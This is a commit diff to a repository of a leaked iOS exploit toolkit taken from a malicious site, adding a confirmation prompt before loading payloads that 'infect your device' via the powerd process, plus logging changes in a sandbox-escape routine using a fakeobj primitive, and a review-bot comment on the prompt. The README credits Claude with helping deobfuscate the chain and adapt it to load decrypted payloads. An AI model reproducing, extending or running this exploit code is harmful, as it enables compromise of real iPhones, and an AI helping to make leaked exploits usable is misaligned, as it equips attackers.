Add confirm dialog back

khanhduytran0
2026-03-08 07:14:53 +07:00
parent d1f2483377
commit cf579abf20
3 changed files with 19 additions and 6 deletions
+1 -1
@@ -2,7 +2,7 @@
The leaked exploit toolkit for various iOS versions. Extracted from `https://sadjd.mijieqi[.]cn/group.html`
Partially deobfuscated and symbolicated by Claude (thanks @34306 for sponsor) and by hand.
Partially deobfuscated, symbolicated, and modified to load decrypted payloads by Claude (thanks @34306 for sponsor) and by hand.
These scripts are modified in a way that allows you to host them locally. Note that this only includes exploit chains for tested devices.
+16 -3
@@ -1160,6 +1160,7 @@ function YA() {/* Original: YA → resolveSymbols */
},
// Fetch a single file as ArrayBuffer
fetchBin(url) {
window.log("Downloading " + url);
return new Promise((resolve, reject) => {
const xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
@@ -1244,6 +1245,18 @@ function YA() {/* Original: YA → resolveSymbols */
if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1);
hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, "");
// When we load the metadata, ask user if they want to continue (will infect device)
if (hashName === "7a7d99099b035b2c6512b6ebeeea6df1ede70fbb") {
let shouldContinue = confirm(
"The script is about to load metadata and subsequent payloads to infect your device in `powerd` process.\n" +
"Cancel = safely STOP this operation\n" +
"OK = continue infect your device");
if (!shouldContinue) {
window.log("[LOADER] Execution canceled by user.");
return;
}
}
// Fetch decrypted F00DBEEF container from payloads/ directory
window.log("[LOADER] Loading payload: " + hashName);
const container = await E.buildContainer(hashName);
@@ -1368,7 +1381,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
for (let _i = 0; _i < _buf.length; _i += 2)
_oA += String.fromCharCode(_buf[_i] | ((_buf[_i + 1] || 0) << 8));
g.oA = _oA;
window.log("[PATCH] Loaded dylib: " + _buf.length + "B, oA=" + _oA.length +
window.log("[PATCH] Loaded bootstrap.dylib: " + _buf.length + "B, oA=" + _oA.length +
" (orig " + _origLen + "), _process=0x" + _processOff.toString(16));
// ── END PATCH (redirect applied after buffer is built, below) ──
@@ -1393,12 +1406,12 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
} else {
window.log("[PATCH] _process at original offset 0x" + _ORIG_PROCESS_OFF.toString(16) + ", no redirect needed");
}
window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
//window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
const dylibLoadAddressI64 = utilityModule.Int64.fromNumber(dylibLoadAddress),
dylibDataAddressMaybe = utilityModule.Int64.fromNumber(platformModule.platformState.exploitPrimitive.fakeobj(dylibBuffer));
window.log("dylib load address: 0x" + dylibLoadAddress.toString(16));
window.log("data address?: 0x" + dylibDataAddressMaybe.toNumber().toString(16));
window.log("D: 0x" + dylibSize);
window.log("dylib size: 0x" + dylibSize);
platformModule.platformState.sandboxEscape.Ad(dylibLoadAddressI64, dylibDataAddressMaybe, dylibSize);
const T = g.YA().ct() + 4;
//alert("D 0x" + T.toString(16));
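Review bot: The confirmation gate added in the `@@ -1244,6 +1245,18 @@` hunk fires only when `hashName` equals one hard-coded value, so any other name handed to this loader reaches `E.buildContainer(hashName)` without a prompt. As a safety interlock it should fail closed: ask once before the first payload load regardless of name, and keep the answer in a flag that is checked ahead of `E.buildContainer`. On cancel the code does a bare `return;`, and because the enclosing function starts and ends outside the hunk it is not visible whether callers treat an `undefined` result as a stop. Replacing it with `throw new Error("[LOADER] Execution canceled by user.");` would make the abort explicit to every caller. `let shouldContinue` is never reassigned and can be `const`.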
+2 -2
@@ -11,8 +11,8 @@
<body>
<script src="https://cdn.jsdelivr.net/npm/eruda"></script>
<script>eruda.init();</script>
<!-- <script src="https://cdn.jsdelivr.net/npm/eruda"></script>
<script>eruda.init();</script> -->
<script src="platform_module.js"></script>
<script src="utility_module.js"></script>